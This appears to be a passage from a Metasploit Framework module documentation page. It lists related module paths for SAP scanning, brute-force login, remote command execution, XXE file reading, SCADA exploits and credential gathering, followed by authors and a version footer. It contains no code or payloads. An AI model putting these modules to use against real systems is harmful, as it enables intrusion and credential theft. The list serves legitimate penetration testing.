- auxiliary/scanner/sap/sap_hostctrl_getcomputersystem
- auxiliary/scanner/sap/sap_icf_public_info
- auxiliary/scanner/sap/sap_icm_urlscan
- auxiliary/scanner/sap/sap_mgmt_con_abaplog
- auxiliary/scanner/sap/sap_mgmt_con_brute_login
- auxiliary/scanner/sap/sap_mgmt_con_extractusers
- auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints
- auxiliary/scanner/sap/sap_mgmt_con_getenv
- auxiliary/scanner/sap/sap_mgmt_con_getlogfiles
- auxiliary/scanner/sap/sap_mgmt_con_getprocesslist
- auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter
- auxiliary/scanner/sap/sap_mgmt_con_instanceproperties
- auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles
- auxiliary/scanner/sap/sap_mgmt_con_listlogfiles
- auxiliary/scanner/sap/sap_mgmt_con_startprofile
- auxiliary/scanner/sap/sap_mgmt_con_version
- auxiliary/scanner/sap/sap_router_info_request
- auxiliary/scanner/sap/sap_router_portscanner
- auxiliary/scanner/sap/sap_service_discovery
- auxiliary/scanner/sap/sap_smb_relay
- auxiliary/scanner/sap/sap_soap_bapi_user_create1
- auxiliary/scanner/sap/sap_soap_rfc_brute_login
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing
- auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence
- auxiliary/scanner/sap/sap_soap_rfc_ping
- auxiliary/scanner/sap/sap_soap_rfc_read_table
- auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir
- auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface
- auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec
- auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_system_info
- auxiliary/scanner/sap/sap_soap_th_saprel_disclosure
- auxiliary/scanner/sap/sap_web_gui_brute_login
- exploit/multi/sap/cve_2020_6207_solman_rs
- exploit/multi/sap/sap_mgmt_con_osexec_payload
- exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec
- exploit/multi/sap/sap_soap_rfc_sxpg_command_exec
- post/multi/sap/smdagent_get_properties
- auxiliary/admin/http/openbravo_xxe
- auxiliary/gather/drupal_openid_xxe
- auxiliary/gather/emc_cta_xxe
- auxiliary/gather/mcafee_epo_xxe
- auxiliary/gather/opennms_xxe
- auxiliary/admin/http/nexpose_xxe_file_read
- exploit/linux/http/zimbra_xxe_rce
- auxiliary/dos/scada/igss9_dataserver
- exploit/windows/http/sap_configservlet_exec_noauth
- exploit/windows/scada/igss9_igssdataserver_listall
- exploit/windows/scada/igss9_igssdataserver_rename
- exploit/windows/scada/igss9_misc
- exploit/windows/scada/igss_exec_17
- post/linux/gather/enum_configs
- post/windows/gather/credentials/digsby
Authors
- Yvan Genuer
- Vladimir Ivanov
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.